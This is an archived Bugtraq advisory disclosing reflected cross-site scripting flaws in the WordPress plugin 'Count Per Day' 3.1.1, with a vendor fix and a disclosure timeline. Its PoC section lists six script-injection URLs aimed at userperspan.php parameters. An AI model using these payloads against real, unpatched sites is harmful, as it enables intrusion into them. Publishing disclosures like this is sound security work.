| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201207160737.q6G7bEMc018792@sf01web1.securityfocus.com> Date: Mon, 16 Jul 2012 07:37:14 GMT From: sschurtz@...ksecurity.de To: bugtraq@...urityfocus.com Subject: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-015 Author: Stefan Schurtz Affected Software: Successfully tested on 'Count Per Day' 3.1.1 Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day Vendor Status: fixed ========================== Vulnerability Description ========================== The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script> ========= Solution ========= Upgrade to the latest version 3.2 ==================== Disclosure Timeline ==================== 29-Jun-2012 - vendor informed (contact form) 02-Jul-2012 - verified by Meistar 03-Jul-2012 - feedback from developer 14-Jul-2012 - fixed by developer ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://wordpress.org/extend/plugins/count-per-day/changelog/ http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt
Powered by blists - more mailing lists